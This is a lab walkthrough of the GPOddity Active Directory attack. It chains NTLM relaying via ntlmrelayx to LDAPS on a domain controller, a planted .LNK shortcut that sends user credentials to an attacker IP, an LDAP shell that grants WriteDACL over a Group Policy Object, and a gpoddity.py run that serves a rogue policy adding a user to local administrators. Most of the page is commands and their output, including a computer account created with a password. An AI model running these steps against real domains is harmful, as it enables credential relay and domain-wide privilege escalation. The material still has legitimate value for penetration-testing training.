GPOddity

GPOddity combines NTLM relaying with the modification of a GPO:

The target user has WriteDACL over a GPO
Relay credentials of the target user for modifying the path of the GP template (gPCFileSysPath)
Load a malicious template from an attacker-controlled location

The target user has WriteDACL over a GPO:

# Get GPO's details with PowerView
> Get-DomainGPO -identity "DevOps Policy"

displayname              : DevOps Policy
name                     : {0BF8D01C-1F62-4BDC-958C-57140B67D147}
cn                       : {0BF8D01C-1F62-4BDC-958C-57140B67D147}
objectguid               : fc0df125-5e26-4794-93c7-e60c6eecb75f
gpcfilesyspath           : \\dollarcorp.moneycorp.local\SysVol\dollarcorp.moneycorp.local\Policies\{0BF8D01C-1F62-4BDC-958C-57140B67D147}
distinguishedname        : CN={0BF8D01C-1F62-4BDC-958C-57140B67D147},CN=Policies,CN=System,DC=dollarcorp,DC=moneycorp,DC=local
objectcategory           : CN=Group-Policy-Container,CN=Schema,CN=Configuration,DC=moneycorp,DC=local

Relay the LDAP service on the DC (172.16.2.1) to the attack's machine (172.160.100.37):

sudo impacket-ntlmrelayx -t ldaps://172.16.2.1 -wh 172.16.100.37 --http-port "80,8080" -i -no-smb-server

Create a shortcut pointing to the attacker's relay server:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command "Invoke-WebRequest -Uri 'http://172.16.100.37' -UseDefaultCredentials"

Copy the .LNK file to the target share:

> xcopy .\student337.lnk \\dcorp-ci\AI
.\student337.lnk
1 File(s) copied

Back on the relay server:

[*] Servers started, waiting for connections
[*] HTTPD(80): Client requested path: /
[*] HTTPD(80): Client requested path: /
[*] HTTPD(80): Connection from 172.16.3.11 controlled, attacking target ldaps://172.16.2.1
[*] HTTPD(80): Client requested path: /
[*] HTTPD(80): Authenticating against ldaps://172.16.2.1 as DCORP/DEVOPSADMIN SUCCEED
[*] Started interactive Ldap shell via TCP on 127.0.0.1:11000 as DCORP/DEVOPSADMIN

Assign the WriteDACL permissions over the target GPO on the attacker (domain user):

$ nc 127.0.0.1 11000
Type help for list of commands

# whoami
u:dcorp\devopsadmin

# write_gpo_dacl student337 {0BF8D01C-1F62-4BDC-958C-57140B67D147}
Adding student337 to GPO with GUID {0BF8D01C-1F62-4BDC-958C-57140B67D147}
LDAP server claims to have taken the secdescriptor. Have fun

Alternatively, if we don't have compromised a domain user, we can add a computer object and assign the permissions to it:

# add_computer std337-gpattack Secretpass@123
Attempting to add a new computer with the name: std337-gpattack$
Inferred Domain DN: DC=dollarcorp,DC=moneycorp,DC=local
Inferred Domain Name: dollarcorp.moneycorp.local
New Computer DN: CN=std337-gpattack,CN=Computers,DC=dollarcorp,DC=moneycorp,DC=local
Adding new computer with username: std337-gpattack$ and password: 
Secretpass@123 result: OK

# write_gpo_dacl std337-gpattack$ {0BF8D01C-1F62-4BDC-958C-57140B67D147}
Adding std337-gpattack$ to GPO with GUID {0BF8D01C-1F62-4BDC-958C-57140B67D147}
LDAP server claims to have taken the secdescriptor. Have fun

Execute the GPOddity attack:

# Create & inject a malicious template
sudo python3 gpoddity.py --gpo-id '0BF8D01C-1F62-4BDC-958C-57140B67D147' --domain 
'dollarcorp.moneycorp.local' --username 'student337' --password 'nUQfN3A8CcV7GxqT' --command 'net localgroup administrators student337 /add' --rogue-smbserver-ip '172.16.100.37' --rogue-smbserver-share 'std337-gp' --dc-ip '172.16.2.1' --smb-mode none

Create the share and move the malicious template to it:

# Create the share
mkdir /mnt/c/AD/Tools/std337-gp
# Move the template to the share
cp -r /mnt/c/AD/Tools/GPOddity/GPT_out/* /mnt/c/AD/Tools/std337-gp/

From a SYSTEM shell point configure the share's path and permissions:

# Configure the share path
C:\Windows\system32>net share std337-gp=c:\AD\Tools\std337-gp
std337-gp was shared successfully.

# Provide full control to everyone
C:\Windows\system32>icacls "C:\AD\Tools\std337-gp" /grant Everyone:F /T

Check the policy's attribute with PowerView:

> Get-DomainGPO -identity "DevOps Policy" | select gpcfilesyspath

gpcfilesyspath
--------------
\\172.16.100.37\std337-gp

When the policy refreshes:

# Check admin access with PowerView
> Find-LocalAdminAccess
dcorp-adminsrv.dollarcorp.moneycorp.local
dcorp-ci.dollarcorp.moneycorp.local
dcorp-std337.dollarcorp.moneycorp.local

PreviousForests NextKerberoasting

Last updated 6 months ago

Was this helpful?